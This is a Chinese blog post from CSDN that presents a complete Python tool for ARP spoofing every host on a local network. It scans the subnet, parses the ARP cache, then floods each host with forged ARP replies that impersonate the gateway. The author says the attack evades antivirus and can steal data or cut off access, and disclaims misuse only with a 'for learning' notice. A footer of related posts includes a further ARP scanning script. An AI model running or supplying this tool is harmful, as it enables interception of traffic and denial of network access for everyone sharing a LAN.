python对局域网所有人进行arp攻击

最新推荐文章于 2024-05-01 23:56:03 发布
置顶 最新推荐文章于 2024-05-01 23:56:03 发布
阅读量6.7k 收藏 81
点赞数 9
分类专栏: 学生 文章标签: 安全 学习 攻击 防攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39911925/article/details/86522107
版权

python使用ARP进行同一局域网所有人进行攻击**
攻击原理
arp作为一个底层协议,我们使用他进行攻击可以避免任何杀毒软件,最关键的就是这种攻击方式简单,并且对局域网造成的伤害也是极高,可以盗取数据,断网,等等。
他的攻击原理无非就是冒充欺骗,我们在同一个局域网下面,通信并不是使用ip地址,而是mac地址,也就是说,我们知道对方的mac地址就可以进行通信,最关键的是在底层协议里面,mac地址会在你最近的通信联系过的人进行保存,看他保存的信息很简单 arp -a 就这么一条简单的命令就可以看到他的mac缓存地址了,如果我要让他们之间互相进行联系我们可以通过ping命令,ping命令可以进行简单的发包,你和他ping通了,那么他的ip和mac地址就会在你的arp缓存地址里面,当然这个攻击虽然NB,但是只对局域网有效。

实验图
这是我的arp目前的缓存地址,因为是手机开的热点,并且就我一个人连接,所以就不去ping了
在这里插入图片描述
攻击需要使用的包

  1. socket socket这个包给我提供了基本的发包和套接字
  2. kamene 这个包其实就是scapy,网上关于kamena这个包的关于信息很少,但是使用方法和scapy包一样
  3. threading 这个包是python自带的一个包,因为我们要对全局域网发起攻击,多线程是必须要有的。
  4. 以上是我们攻击需要用到的python模块

伪造一个arp攻击的包去冒充网关,代码如下

from kamene.all import (
    ARP,
    Ether,
    sendp,
    conf,
    srp
)
	# 构建一个以太网的包
        eth = Ether()
        #hacker_mac_address 在这里代表的是黑客的mac地址
        #因为我们是去冒充网关,所以这个ip地址是我们的网关地址
        #enemy_mac_address 是我们需要对其进行攻击的一个mac地址
        # enemy_ip_address 是沃恩需要对其攻击的ip地址
        arp = ARP(
            op="is-at",
            hwsrc=hacker_mac_address,
            psrc=hacker_ip_address + ".1",
            hwdst=enemy_mac_address,
            pdst=enemy_ip_address,
        )
        #发送包,一秒1次
        sendp(eth / arp, inter=2, loop=1)
        (eth / arp).show()

以上代码,我们就实现了伪造一个包,发给受害者,让他的网关的mac地址指向你,网关是你那么就代表,他所有发送的请求包,都会发到你这里来。

实现对全网段进行攻击
如果对一个网段进行攻击,其实很好理解,他们就是一个对象,并且用多线程执行就可以,废话不多说,直接上代码
1.采集数据

我们要是对全局域网发起攻击,第一步就是采集信息了,这里我们把采集的信息用重定向命令保存到一个文本里面,代码可以看到,我们写了一个位置参数,这样可以让我们随意修改网段进行扫描,最后进行扫描后的数据进行保存,因为我们要快速的对这些地址进行发包,所以我们写了一个类,让他继承多线程的类,我们在get_IP_mac这个函数去执行循环的时候创建对象,并且让他们进行发包,ping -c 1代表的是只发包一次,self.ip_address这里是创建对象的时候传入的一个ip地址

class Ping(threading.Thread):
    def __init__(self, ip):
        super().__init__()
        self.ip_address = ip

    def run(self):
        os.system('ping -c 1 ' + self.ip_address)

def get_ip_mac_text(ip):
    print("\033[0;31;38m已开启自动扫描,为了让攻击变得更加强力,预计1--3分钟内完成扫描!!")
    for i in range(1, 256):
        s = Ping(ip + "." + str(i))
        s.start()
    else:
        # set timeout 30 m ---- wait arp data
        time.sleep(30)
        os.system('arp -a>./mac_地址.txt')
        print("\033[0;34;38m已完成扫描---准备开始分配线程,进行攻击")

通过代码我们采集后的数据格式
在这里插入图片描述
2.对数据进行分割
数据采集完了,但是看上图,数据完全不符合我们需要提交的ip和mac地址,所以在这里,我们需要把这些内容取出来

其实下面代码没什么好介绍的就是用到了普通的文件打开命令,和字符串下标查找和切片,在外面定义了一个列表,因为列表可以保存任何数据的内容,所以在这里,我们定义了一个info,这里是一个空字典,每次循环都会空,经过好几次判断最后把字典写入进去,这一段就是python基础

def get_ip_mac():
    #  all user data save position ,type = list
    ip_mac = []
    with open("mac_地址.txt", "r", encoding="utf-8") as f:
        for i in range(256):
            info = {}
            content = f.readline()
            if content != "":
                # get client text index number----gain ip address
                index_one = content.find("(")
                index_two = content.find(")")
                index_three = content.find("<")
                # get client text index number----gain mac address
                index_four = content.find("位于 ")
                index_five = content.find(" [ether]")
                if index_three == -1:
                    info["ip"] = content[index_one + 1:index_two]
                    info["mac"] = content[index_four + 3:index_five]

                    ip_mac.append(info)
            else:
                # if text content is null,break code
                break
        print("\033[0;29;38m扫描完成,3秒后开始执行攻击,扫描信息已保存运行目录。")
        time.sleep(3)

3.获取我们本机的mac地址

这里就是通过uuid这包获取ip地址,最后取出mac地址,但是取出来的格式,并不是我们要提交的格式,下面那个循环就是变成我们指定的格式,他取出来是没有任何分割符的,我们提交的是每隔着2为就必须要有一个:号

def get_mac_address():
    node = uuid.getnode()
    mac = uuid.UUID(int=node).hex[-12:]
    i = 1
    x = 2
    mac_date = list(mac)
    while i <= len(mac_date):
        if i // x == 1:
            mac_date.insert(i, ":")
            x += 3
        i += 1
    else:
        mac_date.pop()
    null_text = ""
    ite = null_text.join(mac_date)
    ite = ite.upper()

4.编写攻击的类
这个类其实和我们第一张图片无疑,只不过这个是面向对象的,里面写了一个多线程,在这里就不多做介绍了

class Kill(threading.Thread):
    def __init__(self, hacker_mac, hacker_ip, enemy_mac, enemy_ip):
        """
        # LAN Blasting Only
        :param Hacker_ip: hacker ip address--黑客的ip地址
        :param Hacker_mac: hacker mac physical  address--黑客的mac物理地址
        :param Enemy_ip:IP of the attacked--被攻击者的ip地址
        :param Enemy_mac:Physical MAC address of the attackee--被攻击者的物理mac地址
        """
        super().__init__()
        # init package--初始化包
        self.hacker_ip_address = hacker_ip
        self.hacker_mac_address = hacker_mac
        self.enemy_ip_address = enemy_ip
        self.enemy_mac_address = enemy_mac

    def run(self):
        thread = threading.Thread(target=self.attack)
        thread.start()

    def attack(self):
        eth = Ether()
        arp = ARP(
            op="is-at",
            hwsrc=self.hacker_mac_address,
            psrc=self.hacker_ip_address + ".1",
            hwdst=self.enemy_mac_address,
            pdst=self.enemy_ip_address,
        )
        print("\033[1;31;38m攻击已开启--Attack has been opened---攻击初始化成功")
        time.sleep(1)
        print(
            "\033[0;29;38m目标ip:%s----目标mac:%s----我的mac:%s" % (
                self.enemy_ip_address, self.enemy_ip_address, self.hacker_mac_address))
        (eth / arp).show()
        sendp(eth / arp, inter=2, loop=1)

5.创建攻击对象
我们现在该有的数据都有了,现在只需要把列表里面的字典遍历出来然后传入到,我们执行攻击的类里面就行了,遍历数据就这点,下面,我会传全部代码

                for x in ip_mac:
                    ip = x["ip"]
                    mac = x["mac"]
                    p = Kill(get_mac_address(), ip_address, mac, ip)
                    p.start()
                    time.sleep(0.1)

6.整体代码

from kamene.all import (
    ARP,
    Ether,
    sendp,
    conf,
    srp
)
import threading
import os
import uuid
from socket import gethostbyname, gethostname
import time
import multiprocessing


class Kill(threading.Thread):
    def __init__(self, hacker_mac, hacker_ip, enemy_mac, enemy_ip):
        """
        # LAN Blasting Only
        :param Hacker_ip: hacker ip address--黑客的ip地址
        :param Hacker_mac: hacker mac physical  address--黑客的mac物理地址
        :param Enemy_ip:IP of the attacked--被攻击者的ip地址
        :param Enemy_mac:Physical MAC address of the attackee--被攻击者的物理mac地址
        """
        super().__init__()
        # init package--初始化包
        self.hacker_ip_address = hacker_ip
        self.hacker_mac_address = hacker_mac
        self.enemy_ip_address = enemy_ip
        self.enemy_mac_address = enemy_mac

    def run(self):
        thread = threading.Thread(target=self.attack)
        thread.start()

    def attack(self):
        eth = Ether()
        arp = ARP(
            op="is-at",
            hwsrc=self.hacker_mac_address,
            psrc=self.hacker_ip_address + ".1",
            hwdst=self.enemy_mac_address,
            pdst=self.enemy_ip_address,
        )
        print("\033[1;31;38m攻击已开启--Attack has been opened---攻击初始化成功")
        time.sleep(1)
        print(
            "\033[0;29;38m目标ip:%s----目标mac:%s----我的mac:%s" % (
                self.enemy_ip_address, self.enemy_ip_address, self.hacker_mac_address))
        (eth / arp).show()
        sendp(eth / arp, inter=2, loop=1)

    def copy_right(self):
        return "此工具由沫编写,可用于对同一局域网下的人进行高强度攻击!\n只用于为学习交流,请勿对他人故意造成攻击,损失他人利益" \
               "\n作者QQ:2366626231"


# get host mac address -- 48bit -- 获取自身mac地址,为攻击做铺垫
def get_mac_address():
    node = uuid.getnode()
    mac = uuid.UUID(int=node).hex[-12:]
    i = 1
    x = 2
    mac_date = list(mac)
    while i <= len(mac_date):
        if i // x == 1:
            mac_date.insert(i, ":")
            x += 3
        i += 1
    else:
        mac_date.pop()
    null_text = ""
    ite = null_text.join(mac_date)
    ite = ite.upper()
    return ite


class Ping(threading.Thread):
    def __init__(self, ip):
        super().__init__()
        self.ip_address = ip

    def run(self):
        os.system('ping -c 1 ' + self.ip_address)


def logo():
    print("\033[0;31;38m此工具由沫编写,可用于对同一局域网下的人进行高强度攻击!\n只用于为学习交流,请勿对他人故意造成攻击,损失他人利益\n作者QQ:2366626231"
          "\n\n5秒后程序开始执行")


def get_ip_mac():
    #  all user data save position ,type = list
    ip_mac = []
    with open("mac_地址.txt", "r", encoding="utf-8") as f:
        for i in range(256):
            info = {}
            content = f.readline()
            if content != "":
                # get client text index number----gain ip address
                index_one = content.find("(")
                index_two = content.find(")")
                index_three = content.find("<")
                # get client text index number----gain mac address
                index_four = content.find("位于 ")
                index_five = content.find(" [ether]")
                if index_three == -1:
                    info["ip"] = content[index_one + 1:index_two]
                    info["mac"] = content[index_four + 3:index_five]

                    ip_mac.append(info)
            else:
                # if text content is null,break code
                break
        print("\033[0;29;38m扫描完成,3秒后开始执行攻击,扫描信息已保存运行目录。")
        time.sleep(3)
        return ip_mac


def get_ip_mac_text(ip):
    print("\033[0;31;38m已开启自动扫描,为了让攻击变得更加强力,预计1--3分钟内完成扫描!!")
    for i in range(1, 256):
        s = Ping(ip + "." + str(i))
        s.start()
    else:
        # set timeout 30 m ---- wait arp data
        time.sleep(30)
        os.system('arp -a>./mac_地址.txt')
        print("\033[0;34;38m已完成扫描---准备开始分配线程,进行攻击")
    # start reading
    return get_ip_mac()


def main():
    logo()
    time.sleep(5)
    while True:
        option = input("\033[0;29;38m是否开启自动托管型攻击yes or no:\n")
        is_mult = input("\033[0;29;38m是否对整个网段进行攻击yes or no:\n")
        if option == "yes":
            if is_mult == "yes":
                ip_address = input("\033[0;29;38m请输入这个网段的地址--例如192.168.15:\n")
                ip_mac = get_ip_mac_text(ip_address)
                time.sleep(2)
                for x in ip_mac:
                    ip = x["ip"]
                    mac = x["mac"]
                    p = Kill(get_mac_address(), ip_address, mac, ip)
                    p.start()
                    time.sleep(0.1)
        else:
            print("Error")
    # print("\033[1;34;38m是否开启")
    # make thread object
    #
    # p.start()
    # 无法执行此命令
    # print(get_mac_address())
    # print(host)


if __name__ == '__main__':
    main()

我们看一下代码跑起来的效果
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

恩,以上就是对整个局域网发起攻击的代码了,注意的一点是这个代码只能在linux系统上面运行,并且要给sudo权限。。

如果代码逻辑或者讲解有什么问题,请提出宝贵的意见我会改正。

注:本代码完全用于学习,请勿对他人造成利益攻击,如果造成,作者不承担任何法律责任。

沫.....啊
关注
  • 9
    点赞
  • 81
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
arp攻击 python_ARP攻击python实现
weixin_30624835的博客
01-26 1361
1. 前言代码参考:https://github.com/byt3bl33d3r/arpspoof/blob/master/arpspoof/arpspoof.py题目描述:任务三:网络协议堆栈渗透测试任务环境说明:服务器场景:WindowsServer18065服务器场景操作系统:Windows2003 Server服务器场景FTP下载服务用户名:anonymous,密码:123456服务器场景...
python实现局域网攻击_python实现ARP欺骗(宿舍停网警告)
weixin_39989222的博客
11-23 541
arp全称为“地址解析协议”,是根据IP获取对应mac地址的一种协议。主机上也是根据arp缓存表进行内网主机的信息交互的,arp缓存表存放着ip对应mac地址的关系。如果一台主机需要上网,就需要先找到自己的网关ip。由于在以太网中都是用mac地址进行主机的交互的,所以要在arp缓存表中根据ip地址查询对应的mac地址。。找到mac地址后就可以将自己的请求发给网关。网关再代之进行转发。这就是一个主机...
pythonarp工具_Python 实现ARP扫描欺骗工具
weixin_39900531的博客
12-05 391
实现简单的ARP扫描工具: 传入扫描参数main.py -a 192.168.1.1-100 扫描网段内所有的在线主机并显示其MAC地址.from scapy.all import *from optparse import OptionParserimport threadingdef parse_ip(targets):_split = targets.split('-')first_ip =...
技巧大集合,熬夜总结53个Python使用技巧和攻击方法
最新发布
m0_61549984的博客
05-01 14
Python 中虽然也可以通过 @property、@setter、@deleter 设置对应的 Set 和 Get 函数,我们应避免不必要的抽象,这会比直接访问慢 4 - 5 倍。C/C++ 的习惯是把输入输出参数都列为函数的参数,通过指针改变输出参数的值,函数的返回值是执行状态,函数调用方对返回值进行检查,判断是否成功执行。C/C++ 的习惯是定义一个临时变量,用来交换值。相比 C/C++,Python 读文件要简单很多,打开后的文件是一个可迭代对象,每次返回一行内容。
chatgpt赋能pythonPython入侵WiFi网络:了解攻击方法和范措施
www_xuhss_com的博客
06-02 504
本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。🧡AI职场汇报智能办公文案写作效率提升教程 🧡专注于AI+职场+办公方向。下图是课程的整体大纲下图是AI职场汇报智能办公文案写作效率提升教程中用到的ai工具。
Python编程——使用scapy模块对局域网的某主机进行ARP欺骗和攻击
橘子女侠
03-08 2313
1. ARP协议 ARP(Address Resolution Protocol,地址解析协议),位于TCP/IP协议栈中的网络层,负责将某个IP地址转化成对应的MAC地址。 (1) 主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址; (2) 收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询...
python之最简单实现arp攻击
05-30
原来我实现的时候都写了一大堆,今天想到了最简单实现的方法,分享给大家
python通过scapy获取局域网所有主机mac地址示例
12-25
python通过scapy获取局域网所有主机mac地址复制代码 代码如下:#!/usr/bin/env python# -*- coding: utf-8 -*-from scapy.all import srp,Ether,ARP,confipscan=’192.168.1.1/24′try: ans,unans = srp(Ether(dst=...
Python利用scapy实现ARP欺骗的方法
01-20
本次用代码实现的是ARP网关欺骗,通过发送错误的网关映射关系导致局域网内其他主机无法正常路由。使用scapy中scapy.all模块的ARP、sendp、Ether等函数完成包的封装与发送。一个简单的ARP响应报文发送: eth = Ether...
Python ARP扫描脚本
12-19
内有详细的注释,方便初学者对于此模块的理解,有助于初学者的学习、使用
python使用arp欺骗伪造网关的方法
01-20
本文实例讲述了python使用arp欺骗伪造网关的方法。分享给大家供大家参考。具体实现方法如下: #coding:utf-8 ''' arp欺骗局域网pc,将伪造的网关mac以网关的arp应答发送给pc ''' from scapy.all import ARP,send,...
Python黑客编程 学习日记1 - Python实现ARP请求
qq_46081990的博客
03-02 836
由于仅知道目的主机32bit的IP地址并不能发送数据,必须知道目的主机48bit的硬件地址(MAC)才能发送数据,而ARP可以完成IP地址到MAC地址的映射。
arp内网攻击
WEB渗透测试 从入门到萌新
04-18 2044
严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助KaliLinux系统内置的 nmap、arpspoof、driftnet、ettercap、fping等渗透测试工具对局域网内(同WIFI下)同一网段的PC主机、手机进行 ARP欺骗 和 流量监听,实现对目标主机/手机的 断网攻击、图片窃取、密码监听 等攻击目的。 工具 简介 arpspoof ARP欺骗的工具,可毒化受害者ARP缓存,将网关MA...
python:网络安全攻击御的工具
weixin_58753619的博客
04-04 466
对正常的网络行为建立模型,要处理的网络数据和保存在模型内的正常模式相匹配,如果不在正常范围内,就认为是攻击行为,对其做出处理。网络安全攻击御的工具有哪些?
Python黑客攻击的几种技术,你得了解一下
weixin_58753619的博客
07-29 2725
Python提供了丰富的模块,几乎可以直接用于任何黑客领域。对于黑客模块没有提供的区域,可以使用c类型调用操作系统提供的本机API。简而言之,Python可以用于攻击几乎任何领域,如应用程序、Web、网络、系统等。下面描述每个领域中的Python黑客技术。应用程序黑客您可以将任何DLL或源代码插入正在运行的应用程序中,拦截用户的键盘输入以窃取密码。此外,黑客攻击代码还可以插入图片文件,传遍网络。Web黑客网络黑客攻击可以进行网络检查,搜索系统的开放端口,收集和分析网络上的数据包,进行网络嗅探。...
python网络攻击代码_使用Python进行无线网络攻击
weixin_39624816的博客
11-20 1106
PyWifl 模块寻找wifi来源#-*- coding: UTF-8 -*-importpywifidefbies():wifi=pywifi.PyWiFi()#创建一个无限对象ifaces=wifi.interfaces()[0]#取一个无线网卡ifaces.scan()#扫描bessis=ifaces.scan_results()for i inrange(len(bessis)):prin...
python攻击网站的方式_python web框架Flask——csrf攻击
weixin_39836876的博客
11-23 741
CSRF是什么?(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安全隐患之一,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用也就是人们所知道的钓鱼网站。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相...
Python实现常见泛洪攻击
neutra_bayet的博客
07-19 1103
Python实现基本泛洪攻击
python题库刷题网站_python在线刷题网站
热门推荐
weixin_39944638的博客
12-01 1万+
{"moduleinfo":{"card_count":[{"count_phone":1,"count":1}],"search_count":[{"count_phone":4,"count":4}]},"card":[{"des":"阿里技术人对外发布原创技术内容的最大平台;社区覆盖了云计算、大数据、人工智能、IoT、云原生、数据库、微服务、安全、开发与运维9大技术领域。","link1":...
python arp扫描_Python3利用scapy局域网实现自动多线程arp扫描功能
05-28
好的,你的问题是关于Python3利用Scapy局域网实现自动多线程ARP扫描功能。 首先,你需要安装Scapy库,可以使用以下命令: ``` pip install scapy ``` 然后,你可以使用以下Python代码实现ARP扫描功能: ```python from scapy.all import * from threading import Thread def arp_scan(ip): arp = ARP(pdst=ip) ether = Ether(dst="ff:ff:ff:ff:ff:ff") packet = ether/arp result = srp(packet, timeout=3, verbose=0)[0] if result: return {'IP': result[0][1].psrc, 'MAC': result[0][1].hwsrc} else: return {'IP': ip, 'MAC': 'N/A'} def scan_network(target_ip, threads): ips = [target_ip + str(i) for i in range(1, 255)] print("Scanning in progress...") scan_results = [] for ip in ips: t = Thread(target=lambda result_list: result_list.append(arp_scan(ip)), args=(scan_results,)) t.start() if threading.activeCount() > threads: t.join() print("Scan complete.") return scan_results if __name__ == '__main__': target_ip = '192.168.1.' threads = 50 results = scan_network(target_ip, threads) for result in results: print(result['IP'], result['MAC']) ``` 在这个示例中,我们定义了两个函数,arp_scan()和scan_network()。arp_scan()函数用于扫描单个IP地址,并返回IP地址和MAC地址。scan_network()函数用于扫描整个网络,并返回所有扫描结果。 我们还使用了Python的多线程功能来加快扫描速度,并限制了线程数以避免过度消耗系统资源。 最后,我们使用主函数来设置目标IP地址和线程数,然后调用scan_network()函数来执行扫描,并打印扫描结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值